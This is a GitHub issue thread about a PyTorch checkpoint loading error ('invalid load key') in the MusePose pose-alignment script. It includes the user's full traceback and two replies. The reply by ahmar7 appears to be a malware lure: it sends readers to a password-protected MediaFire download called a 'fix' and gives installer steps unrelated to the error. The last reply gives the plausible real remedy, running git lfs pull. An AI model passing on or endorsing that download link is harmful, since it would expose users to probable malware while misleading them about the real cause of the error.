### ISSUE TITLE
_pickle.UnpicklingError: invalid load key, 'v'.

### ISSUE THREAD

**Issue by LucasLOOT** [TMElyralab/MusePose#71]
as the title i met this error when running the command 
`python pose_align.py --imgfn_refer ./assets/images/ref.png --vidfn ./assets/videos/dance.mp4` 

### ### **the package and env is all fine but it can't work ?is there someone tackle this problem?**

![Screenshot from 2024-08-27 15-02-25](https://github.com/user-attachments/assets/ab491afa-ecff-4175-8a5f-817c928b02a0)

`python pose_align.py --imgfn_refer ./assets/images/ref.png --vidfn ./assets/videos/dance.mp4
height: 1920.0
width: 1080.0
fps: 24.0
Loads checkpoint by local backend from path: ./pretrained_weights/dwpose/yolox_l_8x8_300e_coco.pth
Loads checkpoint by local backend from path: ./pretrained_weights/dwpose/dw-ll_ucoco_384.pth
Traceback (most recent call last):
  File "pose_align.py", line 556, in <module>
    main()
  File "pose_align.py", line 551, in main
    run_align_video_with_filterPose_translate_smooth(args)
  File "pose_align.py", line 270, in run_align_video_with_filterPose_translate_smooth
    detector = DWposeDetector(
  File "/home/sysu/Desktop/MusePose/pose/script/dwpose.py", line 74, in __init__
    self.pose_estimation = Wholebody(det_config, det_ckpt, pose_config, pose_ckpt, device)
  File "/home/sysu/Desktop/MusePose/pose/script/wholebody.py", line 55, in __init__
    self.pose_estimator = init_pose_estimator(
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/mmpose/apis/inference.py", line 109, in init_model
    ckpt = load_checkpoint(model, checkpoint, map_location='cpu')
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/mmengine/runner/checkpoint.py", line 636, in load_checkpoint
    checkpoint = _load_checkpoint(filename, map_location, logger)
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/mmengine/runner/checkpoint.py", line 548, in _load_checkpoint
    return CheckpointLoader.load_checkpoint(filename, map_location, logger)
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/mmengine/runner/checkpoint.py", line 330, in load_checkpoint
    return checkpoint_loader(filename, map_location)
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/mmengine/runner/checkpoint.py", line 347, in load_from_local
    checkpoint = torch.load(filename, map_location=map_location)
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/torch/serialization.py", line 815, in load
    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)
  File "/home/sysu/anaconda3/envs/manimate/lib/python3.8/site-packages/torch/serialization.py", line 1033, in _legacy_load
    magic_number = pickle_module.load(f, **pickle_load_args)
_pickle.UnpicklingError: invalid load key, 'v'.
`

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by trendgpt23** [comment]
remember to do `git lfs pull` when you download the packages from hugging face
